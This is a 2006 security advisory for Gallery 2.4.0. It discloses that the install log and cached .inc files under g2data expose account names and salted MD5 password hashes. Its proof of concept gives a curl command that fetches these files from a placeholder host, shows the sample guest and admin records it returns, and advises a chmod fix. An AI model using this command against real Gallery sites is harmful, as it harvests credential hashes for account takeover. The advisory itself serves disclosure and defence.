-----------------------------------------------------
Advisory id: FLS:004

Author:    Federico Fazzi
Date:     08/06/2006, 1:04
Sinthesis: gallery 2.4.0 full, remote file disclosure
Type:     low
Product:   http://gallery.menalto.com/
Patch:     unavailable
-----------------------------------------------------


1) Description:

The installation of gallery write installation log file
and .inc file, where are registered login and password
of master account, the login is in plain-text the instead
the password is an encrypted md5. It the positions of
criticals files,

/g2data/Installog-*.txt
/g2data/cache/entity/0/0/*.inc

Now if you want, you can get all file and read the data
of master, and others.


2) Proof of concept:

curl "http://example/gallery2/g2data/cache/entity/0/0/[1-2].inc" -o
"#1.data"
(note: thats numbers of *.inc are random!)

reading these files:

1.inc
--
modules/core/classes/GalleryUser.class|O:11:"GalleryUser":15:{s:9:"_userName";s:5:"guest";s:9:"_fullName";s:5:"Guest";s:15:"_hashedPassword";s:36:"e\Pj15d716b24485cd6f53f71ceaf9e965fb";s:6:"_email";N;s:9:"_language";N;s:3:"_id";i:5;s:18:"_creationTimestamp";i:1149727740;s:11:"_isLinkable";i:0;s:7:"_linkId";N;s:13:"_linkedEntity";N;s:22:"_modificationTimestamp";i:1149727740;s:13:"_serialNumber";i:1;s:11:"_entityType";s:11:"GalleryUser";s:15:"_onLoadHandlers";N;s:17:"_persistentStatus";O:8:"stdClass":3:{s:5:"flags";i:0;s:8:"modified";a:0:{}s:13:"originalValue";a:0:{}}}
--

2.inc
--
modules/core/classes/GalleryUser.class|O:11:"GalleryUser":15:{s:9:"_userName";s:5:"admin";s:9:"_fullName";s:21:"Gallery

Administrator";s:15:"_hashedPassword";s:36:"6d`qd1f78da8e31fe86f714fe9370ec25c9a";s:6:"_email";s:10:"test@test.it";s:9:"_language";N;s:3:"_id";i:6;s:18:"_creationTimestamp";i:1149727740;s:11:"_isLinkable";i:0;s:7:"_linkId";N;s:13:"_linkedEntity";N;s:22:"_modificationTimestamp";i:1149727740;s:13:"_serialNumber";i:1;s:11:"_entityType";s:11:"GalleryUser";s:15:"_onLoadHandlers";N;s:17:"_persistentStatus";O:8:"stdClass":3:{s:5:"flags";i:0;s:8:"modified";a:0:{}s:13:"originalValue";a:0:{}}}
--

we have discovered some information of guest account
and master account, reassumed:

Name of admin: "Guest" / "Gallery Administrator"
Name of account: "guest" / "admin"
Password of account (md5encrypt): "e\Pj15d716b24485cd6f53f71ceaf9e965fb" /
"6d`qd1f78da8e31fe86f714fe9370ec25c9a"
Mail addr: "test@test.it"


3) Solution:

Apply the permission of directories and files into g2data/

(-rwx-----x)
chmod 701 g2data/